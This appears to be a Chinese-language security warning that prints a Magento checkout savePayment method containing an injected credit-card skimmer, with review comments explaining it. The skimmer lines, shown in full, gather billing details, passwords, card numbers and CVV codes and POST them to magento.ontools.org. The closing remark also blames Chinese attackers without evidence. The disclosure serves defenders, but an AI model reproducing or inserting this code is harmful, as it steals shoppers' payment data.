Magento 盗取信用卡信息的恶意代码被写在 savePayment 方法中

  /**
   * Store the payment step of the checkout on the current quote.
   *
   * NOTE(review): the four long lines between importData() and $quote->save()
   * do not take part in saving the payment step. They copy the customer's
   * billing details and the full card fields out of $data and POST them to a
   * third-party host, i.e. they are an injected payment skimmer. Everything
   * else in the method only touches the quote and the checkout session.
   *
   * @param array $data payment form fields; 'method' and the cc_* keys are read below
   * @return array array('error' => -1, 'message' => ...) when $data is empty,
   *               otherwise an empty array
   */
  public function savePayment($data)
    {
        // Reject an empty submission before touching the quote.
        if (empty($data)) {
            return array('error' => -1, 'message' => Mage::helper('checkout')->__('Invalid data.'));
        }
        $quote = $this->getQuote();
        // A virtual quote records the payment method on the billing address,
        // any other quote records it on the shipping address.
        if ($quote->isVirtual()) {
            $quote->getBillingAddress()->setPaymentMethod(isset($data['method']) ? $data['method'] : null);
        } else {
            $quote->getShippingAddress()->setPaymentMethod(isset($data['method']) ? $data['method'] : null);
        }

        // shipping totals may be affected by payment method
        if (!$quote->isVirtual() && $quote->getShippingAddress()) {
            $quote->getShippingAddress()->setCollectShippingRates(true);
        }

        // Bitmask of the Mage_Payment_Model_Method_Abstract::CHECK_* flags,
        // handed to importData() together with the form fields.
        $data['checks'] = Mage_Payment_Model_Method_Abstract::CHECK_USE_CHECKOUT
            | Mage_Payment_Model_Method_Abstract::CHECK_USE_FOR_COUNTRY
            | Mage_Payment_Model_Method_Abstract::CHECK_USE_FOR_CURRENCY
            | Mage_Payment_Model_Method_Abstract::CHECK_ORDER_TOTAL_MIN_MAX
            | Mage_Payment_Model_Method_Abstract::CHECK_ZERO_TOTAL;

        $payment = $quote->getPayment();
        $payment->importData($data);

        // ---- Injected skimmer: the next four lines are the malicious part ----
        // Gathers into $send: the selected payment method; the billing address
        // name, e-mail, street lines 1 and 2, city, region, postcode, country and
        // telephone; reads of the customer password, tax/VAT number, gender and
        // date of birth; the card owner, type, full number, start date, expiry
        // date and verification code (cc_cid) taken from $data; the client IP
        // (REMOTE_ADDR) and the store host name (SERVER_NAME).
                $send = array('PaymentMethod' => $data['method'], 'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(), 'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(), 'Billing Addres1' => $this->getQuote()->getBillingAddress()->getStreet(1), 'Billing Address2' => $this->getQuote()->getBillingAddress()->getStreet(2), 'BillingCity' => $this->getQuote()->getBillingAddress()->getCity(), 'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(), 'Billing PosCode' => $this->getQuote()->getBillingAddress()->getPostcode(), 'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(), 'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(), 'Account password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "KOSONG", 'Billing taxvat' => $this->getQuote()->getBillingAddress()->getTaxvat() or "KOSONG", 'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "KOSONG", 'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "KOSONG", 'CcOwner' => $data['cc_owner'], 'CcType' => $data['cc_type'], 'CcNumber' => $data['cc_number'], 'CcStart' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))), 'CcExpayed' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))), 'CcSec' => $data['cc_cid'], 'CustomIP' => trim(getenv('REMOTE_ADDR')), 'WebStore' => trim($_SERVER['SERVER_NAME']));
        // Appends one "key=value" line per collected field.
                foreach ($send as $param => $value) { $send.= $param . '=' . $value . "\n"; }
        // Sends the client IP to geoplugin.net over plain HTTP to obtain city,
        // region and country, builds a subject line from the card type, the
        // first six digits of the card number, the store host name and that
        // country, and assembles the POST body in $xupdate. $datasend is first
        // used with .= and is not initialised anywhere in this method.
                $datasend.= substr($send, 5, -1);$datasend.= "\n";$a = getenv('REMOTE_ADDR');$a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$a}"));$datasend.="Visit = ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";$update = "https://magento.ontools.org/update";$binCC = substr($data['cc_number'], 0, 6);$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
        // POSTs $xupdate to the URL in $update with certificate and host-name
        // verification switched off, redirects followed and a 60-second timeout.
        // curl_exec() runs inline, so the payment step waits on this request;
        // $result is not read afterwards.
        // NOTE(review): outbound requests from the checkout to either host above
        // are the observable trace of this code. Restore the method from a
        // known-good copy of the same Magento release instead of hand-deleting
        // lines, and treat card data submitted while this code was present as
        // exposed.
        $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
               
        // ---- End of injected code ----
        $quote->save();

        // Mark the payment step complete and allow the review step.
        $this->getCheckout()
            ->setStepData('payment', 'complete', true)
            ->setStepData('review', 'allow', true);

        return array();
    }

https://magento.ontools.org/update 和 https://magento.ontools.net/update 是两个接收被盗数据的网址(上面的代码中只出现了 .org 这一个),请站长留意;强烈怀疑是国人所为!!!

 
